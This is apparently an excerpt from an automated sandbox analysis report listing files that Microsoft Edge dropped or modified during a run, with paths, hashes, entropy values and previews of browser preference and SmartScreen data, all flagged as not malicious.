                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                                  Entropy (8bit):3.9904355005135823
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:0xXF/XctY5GUf+:0RFeUf+
                                                                                                                                                                                  MD5:E144AFBFB9EE10479AE2A9437D3FC9CA
                                                                                                                                                                                  SHA1:5AAAC173107C688C06944D746394C21535B0514B
                                                                                                                                                                                  SHA-256:EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
                                                                                                                                                                                  SHA-512:837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                  Entropy (8bit):4.3751917412896075
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                  MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                  SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                  SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                  SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a66f9bd4-797a-4b3e-8bcd-d3fb5ed73e15.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45888
                                                                                                                                                                                  Entropy (8bit):6.092484193558416
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKBXPi1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOK0zKtSmd6qE7lFov
                                                                                                                                                                                  MD5:7DF0648ECC40DAF8910DFC4C1B1A802D
                                                                                                                                                                                  SHA1:721EC88B3F1D82020C44372D53006492A1712EC1
                                                                                                                                                                                  SHA-256:602D358147209D2097B7B04CBEFDF5184B21A7616D75711B94CF4EF2EFE0A767
                                                                                                                                                                                  SHA-512:A83411A679603AB0A097D0A41B335720363C62644A7DC313D3443A18BBB75E5FA73AE0628BEA57C780218BE4BEBE58BA77C5D5C3CEA9E0C1D35FDB85E366C0EA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"270EEF00BF873436BAE0FD02F259866ED05E6988F78734E2F33D6DB953BC6531\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c50c0827-a3a6-4edd-926c-edce2d1acc1f.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):44902
                                                                                                                                                                                  Entropy (8bit):6.095884668343846
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWNmi1zNt2CNoaLFQP9uKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynabKtSmd6qE7lFoC
                                                                                                                                                                                  MD5:63F3469CA792E17C27937C9F6982B83C
                                                                                                                                                                                  SHA1:2F18E896574CBE286F76F2142DF29A2FF08F9C0E
                                                                                                                                                                                  SHA-256:9D9DF2CBC69471290192A3FC50441758B6A7AB75E75504DB533D7F39C3637B82
                                                                                                                                                                                  SHA-512:259AA6D4AD784769334FA03451AE7CFB132D82078CB1A3E3E45032F530A565891F19EFBD7CCE7A43EF5A6125CDA6DFEE8F60A76C228AA6A3CFCDCBB311948B97
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\cbc405b5-71ba-4585-9962-3bdf0c7e6529.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.092531414876403
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKBLpi1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOK2zKtSmd6qE7lFov
                                                                                                                                                                                  MD5:434B94B5906F1EA4CEDA5B39356E9A9E
                                                                                                                                                                                  SHA1:CD728C877B8214393997FAF320002EA0641B28B9
                                                                                                                                                                                  SHA-256:30E11A10DADAF1999E8D2D0B5DBD315D6FDCCA7E108BFB8815B5FD2EABA47539
                                                                                                                                                                                  SHA-512:691D56C1B0047CDA0632207357979D1AB7F18E79AF25B6ECD53F156CC3E034EB5CFC7C5D47D7948875831693FCC71B20D78EC98B1938801552A8F19AA76B1721
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"270EEF00BF873436BAE0FD02F259866ED05E6988F78734E2F33D6DB953BC6531\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d0b4717e-2176-4ba3-b652-0a6e471c40f7.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.09252785286692
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKBCli1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOKtzKtSmd6qE7lFov
                                                                                                                                                                                  MD5:8A15BAE0DA243D937D447DEF39BCDD23
                                                                                                                                                                                  SHA1:91CCC9DF269A3BEDFE8FA09A0D1B9F661963C879
                                                                                                                                                                                  SHA-256:C729A5D10D55919F7C7148537766CCDA5FB77C7DB58195627D6664EBD4EF15DE
                                                                                                                                                                                  SHA-512:1B5A578291E8DAEBEE13DCC9DAA6396BE02EEA11AFC6FCEEA41DC345A4553A723C9B0C1FC0480556AC2E122A4DEC4076C6A757C2B03115CBAAE5C53F3D35D794
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"270EEF00BF873436BAE0FD02F259866ED05E6988F78734E2F33D6DB953BC6531\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d272791f-1ce3-440a-985b-6a2a5f238f02.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45888
                                                                                                                                                                                  Entropy (8bit):6.092469357830813
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKBcRi1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOK7zKtSmd6qE7lFov
                                                                                                                                                                                  MD5:FFC4990850200D027190B3995A43A017
                                                                                                                                                                                  SHA1:A9C62D678FC9CCD6547156D5AAF96C101FB5E56A
                                                                                                                                                                                  SHA-256:C17CFFBA51CD31DC0845D7CE4C5003E4C0A4778800598AF8046587C7D4E05EBA
                                                                                                                                                                                  SHA-512:05B49FE7017C1A5DEA24AD6F872675951CEC43385E54D31391A04A6B61C1A829AF0752509DFE880B5F445FB41203F4F5304389D135BD99F2D9C1F420AB299983
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"270EEF00BF873436BAE0FD02F259866ED05E6988F78734E2F33D6DB953BC6531\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d31abbdc-eaaa-4a1f-b06f-4a8c6cf88fbc.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.0924167428247715
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:3DXzgWPsj/qlGJqIY8GB4xKyPJi1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:3/Ps+wsI7yOKlMKtSmd6qE7lFov
                                                                                                                                                                                  MD5:D4389D2BF8008EC01C8AB7608F5733B4
                                                                                                                                                                                  SHA1:52082178178A6D8585C832FACB7B00288836CF38
                                                                                                                                                                                  SHA-256:2086F69FA5450752260D6A3DA0C8EFB7D2D2A35F4E49A98EFE3CBE09E33E788F
                                                                                                                                                                                  SHA-512:CDDFDD18401F743127A7483B863D4356B37C2CF0DA70113501B4EA514541AF1AF8CDE19C0E424805F59521F9B1860094C2DC4E10C5FAA8515A4127D65B6A1B25
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d35f40bf-8d02-46b1-8538-bfee451f99bc.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.092410535146648
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:3DXzgWPsj/qlGJqIY8GB4xKy5tbi1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47A:3/Ps+wsI7yOKvMKtSmd6qE7lFov
                                                                                                                                                                                  MD5:30DA1C56AA3ED92FC5536B412A6DE4D5
                                                                                                                                                                                  SHA1:9455012306325D937BC6BB5ED7A5A4DB0750B2D1
                                                                                                                                                                                  SHA-256:27836724ED8D0B383ADB0122846EF27146DD5CB9EDC19E059E40610C33A9834C
                                                                                                                                                                                  SHA-512:52C81A60721CE703B35E3F8961D6E9F392FD9B4C4E26DD8A15EA33526AC8AF9EB25CE268DA0EF8816EBD6060B6B61B11E3485A1B05526905F10CFDBB94C35738
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\df7b025c-788a-4412-b112-3734f529981e.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.092499967645902
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKyUJi1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOKkMKtSmd6qE7lFov
                                                                                                                                                                                  MD5:C6B0F0C8D80627BE14FB9E3D99F3C8A4
                                                                                                                                                                                  SHA1:E26481ACBA6A7E16D7B8AC13418FA9E80A6D4E7C
                                                                                                                                                                                  SHA-256:7B3B2C0E88EDABBBE20F0E524531684A1836F7B53C52FA06C33375F38EFCA212
                                                                                                                                                                                  SHA-512:8C0811380E4AD34D2D3052EC9DB46463EABF2350801C1A08EB258224492373D120B912B4B8625E01175782BAA19AE3BDBF80D3560A8F227DB468D50DC0935869
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"270EEF00BF873436BAE0FD02F259866ED05E6988F78734E2F33D6DB953BC6531\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e7b0c7da-94a7-402d-8131-caefa10f6706.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.0925320218455505
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKBUJi1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOKvzKtSmd6qE7lFov
                                                                                                                                                                                  MD5:DEB15F8A806E63E7037F8F9C50969E92
                                                                                                                                                                                  SHA1:683AD72019ECBF769201AA06EC3C79BE3A2D2276
                                                                                                                                                                                  SHA-256:0A44F02A73713EECC3C1ECBC6F395F0D3C590E345281A9542F7C3A41C3B0B669
                                                                                                                                                                                  SHA-512:2C485FD8002839DE7652B0F6D977F09D07A9B5DB07F5938ED86381E251ACEDD302919613177EBEC2D4EE69520CB992139CF314F14C8925F6B620FEC8F8E32FF4
                                                                                                                                                                                  Malicious:false
